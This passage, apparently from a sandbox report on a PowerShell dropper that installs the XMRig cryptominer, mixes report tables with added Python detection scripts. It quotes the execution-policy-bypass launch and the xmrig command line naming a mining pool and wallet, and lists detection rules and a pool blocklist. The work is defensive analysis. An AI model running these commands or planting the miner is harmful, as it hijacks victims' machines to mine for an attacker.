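    parent_image: str = ""
    cmdline: str = ""
    privilege: str = ""


def split_cmdline(cmdline: str) -> list:
    # posix=False keeps backslashes and quoted Windows paths intact
    return shlex.split(cmdline, posix=False)


def arg_after(argv: list, flag: str) -> str:
    """Value following a flag (case-insensitive), quotes stripped, '' if absent."""
    low = [a.lower() for a in argv]
    i = low.index(flag.lower()) if flag.lower() in low else -1
    return argv[i + 1].strip('"') if 0 <= i < len(argv) - 1 else ""


def miner_args(cmdline: str) -> dict:
    """Pick out xmrig-style -o/--url <host:port> and -u/--user <wallet>."""
    argv = split_cmdline(cmdline)
    found = {}
    for i, a in enumerate(argv[:-1]):
        if a in ("-o", "--url"):
            host, sep, port = argv[i + 1].rpartition(":")
            found["pool_host"] = host if sep else port
            found["pool_port"] = port if sep else ""
        elif a in ("-u", "--user"):
            found["wallet"] = argv[i + 1]
    return found


def is_pool(host: str) -> bool:
    return any(host == s or host.endswith("." + s) for s in POOL_SUFFIXES)


def evaluate(events: list) -> list:
    """Return (rule, pid, detail) tuples for everything that matches."""
    findings = []
    for e in events:
        image = e.image.lower()
        if e.kind == "process_create":
            argv = split_cmdline(e.cmdline)
            if (image.endswith("powershell.exe")
                    and arg_after(argv, "-ExecutionPolicy").lower() == "bypass"
                    and USER_TEMP.match(arg_after(argv, "-File"))):
                findings.append(("ps_bypass_temp_script", e.pid, arg_after(argv, "-File")))
            m = miner_args(e.cmdline)
            if m and (is_pool(m.get("pool_host", "")) or MONERO_ADDR.match(m.get("wallet", ""))):
                findings.append(("xmrig_pool_args", e.pid, f"{m.get('pool_host')}:{m.get('pool_port')}"))
            if e.parent_image.lower().endswith("powershell.exe") and USER_TEMP.match(e.image):
                findings.append(("ps_spawns_temp_exe", e.pid, e.image))
        elif e.kind == "privilege_adjust":
            # XMRig asks for SeLockMemoryPrivilege to use huge pages; a binary
            # in a user's Temp directory has no business holding it
            if e.privilege == "SeLockMemoryPrivilege" and USER_TEMP.match(e.image):
                findings.append(("lock_memory_from_temp", e.pid, e.image))
    return findings


# Constructed from the report's behavioral21 process tree and token entries
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
XMRIG = r"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe"
PS_CMD = ('powershell.exe -ExecutionPolicy bypass -File '
          r'"C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"')
XMRIG_CMD = (f'"{XMRIG}" -o gulf.moneroocean.stream:10128 -u '
             "45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF")
SAMPLE_EVENTS = [
    Event("process_create", 2888, PS, cmdline=PS_CMD),
    Event("process_create", 3504, XMRIG, ppid=2888, parent_image=PS, cmdline=XMRIG_CMD),
    Event("privilege_adjust", 2888, PS, privilege="SeDebugPrivilege"),
    Event("privilege_adjust", 3504, XMRIG, privilege="SeLockMemoryPrivilege"),
]

if __name__ == "__main__":
    for rule, pid, detail in evaluate(SAMPLE_EVENTS):
        print(f"{rule:24} pid={pid} {detail}")
```

Run as-is it prints four findings: the bypass launch of a Temp script by PID 2888, the pool arguments and the Temp-resident child of PowerShell for PID 3504, and the SeLockMemoryPrivilege request from that same Temp binary. The SeDebugPrivilege line for PowerShell is deliberately not a finding on its own, since elevated PowerShell sessions take it routinely; it only becomes interesting in combination with the rest of the chain.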
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| GB | 184.28.176.33:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 33.176.28.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.197.79.40.in-addr.arpa | udp |
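Read in order, the table shows lookups and 443 connections for github.com and objects.githubusercontent.com (the host that serves GitHub release assets) before the first TCP connection to gulf.moneroocean.stream on port 10128; every other row is either a DNS query or a PTR (reverse) lookup of an address the sandbox touched. The script below is an added example and not part of the report: it parses these rows, classifies each flow, and maps every in-addr.arpa lookup back to the TCP destination it describes, so the pool connection and the download stand out from the reverse-lookup noise. NETWORK_TABLE is copied from this section; POOL_SUFFIXES and the category names are this example's own assumptions.

```python
"""Classify the behavioral21 Network table and correlate PTR lookups.

Added example, not part of the sandbox report. NETWORK_TABLE is copied from
the report; POOL_SUFFIXES is an assumed blocklist seeded with the only pool
domain the report shows, and the category names are this example's own.
"""
import ipaddress
from collections import Counter

NETWORK_TABLE = """\
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| GB | 184.28.176.33:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 33.176.28.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.197.79.40.in-addr.arpa | udp |
"""

POOL_SUFFIXES = ("moneroocean.stream",)   # assumed blocklist; extend for your estate
WEB_PORTS = {80: "http", 443: "https"}


def parse_table(text: str) -> list:
    """Rows '| CC | ip:port | domain | proto |' -> list of flow dicts."""
    flows = []
    for line in text.splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) != 4 or cells[0] == "Country":
            continue
        cc, dest, domain, proto = cells
        ip, _, port = dest.rpartition(":")
        flows.append({"cc": cc, "ip": ip, "port": int(port), "domain": domain, "proto": proto})
    return flows


def ptr_to_ip(name: str):
    """'133.108.199.185.in-addr.arpa' -> '185.199.108.133'; None if not an IPv4 PTR name."""
    suffix = ".in-addr.arpa"
    if not name.endswith(suffix):
        return None
    try:
        return str(ipaddress.IPv4Address(".".join(reversed(name[:-len(suffix)].split(".")))))
    except ValueError:
        return None


def is_pool(host: str) -> bool:
    return any(host == s or host.endswith("." + s) for s in POOL_SUFFIXES)


def classify(flow: dict) -> str:
    d = flow["domain"]
    if d.endswith((".in-addr.arpa", ".ip6.arpa")):
        return "rdns"                       # reverse lookup, not a contact in itself
    if flow["proto"] == "udp" and flow["port"] == 53:
        return "dns"
    if is_pool(d):
        return "mining_pool"
    return WEB_PORTS.get(flow["port"], "nonweb_tcp")   # odd port, no blocklist hit: still worth a look


def summarize(flows: list) -> Counter:
    return Counter(classify(f) for f in flows)


def correlate_ptr(flows: list):
    """Map each PTR lookup to the TCP destination it describes; list the rest."""
    tcp_by_ip = {f["ip"]: f["domain"] for f in flows if f["proto"] == "tcp"}
    matched, unmatched = {}, []
    for f in flows:
        ip = ptr_to_ip(f["domain"])
        if ip is None:
            continue
        if ip in tcp_by_ip:
            matched[ip] = tcp_by_ip[ip]
        else:
            unmatched.append(ip)
    return matched, unmatched


def pool_contacts(flows: list) -> list:
    return [f for f in flows if classify(f) == "mining_pool"]


if __name__ == "__main__":
    flows = parse_table(NETWORK_TABLE)
    print(dict(summarize(flows)))
    matched, unmatched = correlate_ptr(flows)
    for ip, domain in matched.items():
        print(f"PTR {ip:16} -> {domain}")
    print(f"{len(unmatched)} PTR lookups have no TCP destination in the table")
    for f in pool_contacts(flows):
        print(f"pool: {f['domain']} {f['ip']}:{f['port']} ({f['cc']})")
```

On this table the split is 16 reverse lookups, 4 forward DNS queries, 4 HTTPS connections and the single pool connection. Four of the PTR lookups resolve back to the GitHub, githubusercontent, bing and moneroocean TCP destinations; the other twelve name addresses the table never shows a connection to, which is the kind of gap to note rather than explain away when you are building a timeline from sandbox output.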
Files
memory/2888-0-0x00007FFB832B3000-0x00007FFB832B5000-memory.dmp
memory/2888-6-0x000002216F580000-0x000002216F5A2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mmf2d2rg.grv.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2888-11-0x00007FFB832B0000-0x00007FFB83D71000-memory.dmp
memory/2888-12-0x00007FFB832B0000-0x00007FFB83D71000-memory.dmp
memory/2888-14-0x00007FFB832B0000-0x00007FFB83D71000-memory.dmp
memory/2888-15-0x000002216F830000-0x000002216F842000-memory.dmp
memory/2888-16-0x000002216F550000-0x000002216F55A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3504-47-0x00000277693D0000-0x00000277693F0000-memory.dmp
memory/3504-48-0x0000027769520000-0x0000027769540000-memory.dmp
memory/3504-49-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-50-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/2888-51-0x00007FFB832B0000-0x00007FFB83D71000-memory.dmp
memory/3504-54-0x0000027769560000-0x0000027769580000-memory.dmp
memory/3504-53-0x0000027769540000-0x0000027769560000-memory.dmp
memory/2888-52-0x00007FFB832B3000-0x00007FFB832B5000-memory.dmp
memory/2888-55-0x00007FFB832B0000-0x00007FFB83D71000-memory.dmp
memory/3504-56-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-57-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-58-0x0000027769540000-0x0000027769560000-memory.dmp
memory/3504-59-0x0000027769560000-0x0000027769580000-memory.dmp
memory/3504-60-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
(58 further dumps of the same region of PID 3504 (xmrig.exe) follow, indices 61 through 118, identical apart from the index)
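The dump names above encode the PID, a capture index and the dumped address range. For PID 3504 (xmrig.exe, per the WriteProcessMemory entry) the same 0xC33000-byte region is captured again and again, while the small 0x20000-byte regions appear only once or twice; PID 2888 (powershell.exe) shows its own large region at 0x00007FFB832B0000. The script below is an added example, not part of the report: it parses that naming pattern, groups the dumps by process and region, and reports the sizes and capture counts, run here over a constructed subset of the list above. PID_IMAGE is taken from this analysis' WriteProcessMemory entry; the output format is this example's own.

```python
"""Summarize sandbox memory-dump names per process and address region.

Added example, not part of the sandbox report. The names follow the report's
'memory/<pid>-<index>-<start>-<end>-memory.dmp' pattern; SAMPLE_DUMPS is a
constructed subset of behavioral21's Files section, and PID_IMAGE comes from
that analysis' WriteProcessMemory entry (2888 = powershell.exe, 3504 = xmrig.exe).
"""
import re
from collections import defaultdict

DUMP_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")

PID_IMAGE = {2888: "powershell.exe", 3504: "xmrig.exe"}

SAMPLE_DUMPS = """\
memory/2888-0-0x00007FFB832B3000-0x00007FFB832B5000-memory.dmp
memory/2888-6-0x000002216F580000-0x000002216F5A2000-memory.dmp
memory/2888-11-0x00007FFB832B0000-0x00007FFB83D71000-memory.dmp
memory/2888-12-0x00007FFB832B0000-0x00007FFB83D71000-memory.dmp
memory/3504-47-0x00000277693D0000-0x00000277693F0000-memory.dmp
memory/3504-48-0x0000027769520000-0x0000027769540000-memory.dmp
memory/3504-49-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-50-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-56-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-60-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
""".split()


def parse_dump_name(name: str):
    """'memory/3504-60-0x...-0x...-memory.dmp' -> dict, or None if not a dump name."""
    m = DUMP_RE.match(name)
    if not m:
        return None
    pid, idx, start, end = m.groups()
    return {"pid": int(pid), "index": int(idx), "start": int(start, 16), "end": int(end, 16)}


def summarize_dumps(names: list) -> dict:
    """{(pid, start, end): {"size": bytes, "count": captures, "indices": [...]}}"""
    regions = defaultdict(lambda: {"size": 0, "count": 0, "indices": []})
    for n in names:
        d = parse_dump_name(n)
        if d is None:
            continue
        r = regions[(d["pid"], d["start"], d["end"])]
        r["size"] = d["end"] - d["start"]
        r["count"] += 1
        r["indices"].append(d["index"])
    return dict(regions)


def largest_region_per_pid(summary: dict) -> dict:
    """pid -> (start, end, size) of the biggest region captured for that process."""
    best = {}
    for (pid, start, end), r in summary.items():
        if pid not in best or r["size"] > best[pid][2]:
            best[pid] = (start, end, r["size"])
    return best


def report(names: list) -> list:
    """One line per (pid, region), largest region first."""
    lines = []
    for (pid, start, end), r in sorted(summarize_dumps(names).items(),
                                       key=lambda kv: -kv[1]["size"]):
        lines.append(f"pid {pid} ({PID_IMAGE.get(pid, '?')}) "
                     f"0x{start:016X}-0x{end:016X} size 0x{r['size']:X} "
                     f"dumped {r['count']}x at indices {r['indices']}")
    return lines


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_DUMPS)))
```

Over the subset this yields six (pid, region) groups, with the 0xC33000-byte xmrig.exe region at 0x00007FF6F7E90000 on top and PowerShell's 0xAC1000-byte region at 0x00007FFB832B0000 second. As a heuristic only: on 64-bit Windows a process's own executable is usually mapped in the 0x7FF6 to 0x7FF7 range and system DLLs higher, around 0x7FF8 to 0x7FFF, which is consistent with the big 3504 region being the miner image and the big 2888 region being a library loaded by PowerShell; the report itself does not name either mapping, so treat that reading as an inference to confirm against the dump contents.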
Analysis: behavioral22
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:36
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1780s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
(63 further identical rows omitted: all 64 entries recorded for this signature have every field N/A)
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4384 wrote to memory of 4128 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4384 wrote to memory of 4128 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 1.0.a.d.6.8.4.c.2.6.6.6.8.4.0.e.1.0.a.d.6.8.4.c.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.73.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
Files
memory/4384-1-0x00007FF95A543000-0x00007FF95A544000-memory.dmp
memory/4384-5-0x000001B453230000-0x000001B453252000-memory.dmp
memory/4384-6-0x00007FF95A540000-0x00007FF95AF2C000-memory.dmp
memory/4384-9-0x000001B453500000-0x000001B453576000-memory.dmp
memory/4384-10-0x00007FF95A540000-0x00007FF95AF2C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w55l2h01.dbd.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4384-25-0x00007FF95A540000-0x00007FF95AF2C000-memory.dmp
memory/4384-48-0x000001B453580000-0x000001B453592000-memory.dmp
memory/4384-61-0x000001B4532E0000-0x000001B4532EA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4128-90-0x000001A88A160000-0x000001A88A180000-memory.dmp
memory/4128-91-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4128-92-0x00007FF642360000-0x00007FF642F93000-memory.dmp
memory/4384-94-0x00007FF95A540000-0x00007FF95AF2C000-memory.dmp
memory/4384-93-0x00007FF95A543000-0x00007FF95A544000-memory.dmp
memory/4384-95-0x00007FF95A540000-0x00007FF95AF2C000-memory.dmp
memory/4384-96-0x00007FF95A540000-0x00007FF95AF2C000-memory.dmp
memory/4128-97-0x00007FF642360000-0x00007FF642F93000-memory.dmp
(60 further dumps of the same region of PID 4128 (xmrig.exe) follow, indices 98 through 157, identical apart from the index)
Analysis: behavioral28
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:36
Platform
win11-20240611-en
Max time kernel
1796s
Max time network
1791s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
(63 further identical rows omitted: all 64 entries recorded for this signature have every field N/A)
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1648 wrote to memory of 3560 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1648 wrote to memory of 3560 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/1648-0-0x00007FF9DDFD3000-0x00007FF9DDFD5000-memory.dmp
memory/1648-1-0x000001B03EC90000-0x000001B03ECB2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_njkbfdil.ppm.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1648-10-0x00007FF9DDFD0000-0x00007FF9DEA92000-memory.dmp
memory/1648-11-0x00007FF9DDFD0000-0x00007FF9DEA92000-memory.dmp
memory/1648-12-0x00007FF9DDFD0000-0x00007FF9DEA92000-memory.dmp
memory/1648-14-0x000001B057680000-0x000001B057692000-memory.dmp
memory/1648-15-0x000001B057210000-0x000001B05721A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3560-46-0x000001F5F7490000-0x000001F5F74B0000-memory.dmp
memory/3560-47-0x000001F5F77F0000-0x000001F5F7810000-memory.dmp
memory/3560-48-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-50-0x000001F5F8FF0000-0x000001F5F9010000-memory.dmp
memory/3560-49-0x000001F5F7810000-0x000001F5F7830000-memory.dmp
memory/3560-51-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/1648-52-0x00007FF9DDFD0000-0x00007FF9DEA92000-memory.dmp
memory/1648-53-0x00007FF9DDFD3000-0x00007FF9DDFD5000-memory.dmp
memory/3560-54-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-55-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
memory/3560-56-0x000001F5F7810000-0x000001F5F7830000-memory.dmp
memory/3560-57-0x000001F5F8FF0000-0x000001F5F9010000-memory.dmp
memory/3560-58-0x00007FF7999B0000-0x00007FF79A5E3000-memory.dmp
(58 further dumps of the same region of PID 3560 (xmrig.exe) follow, indices 59 through 116, identical apart from the index)
Analysis: behavioral29
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:37
Platform
win10v2004-20240508-en
Max time kernel
1794s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
(63 further identical rows omitted: all 64 entries recorded for this signature have every field N/A)
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
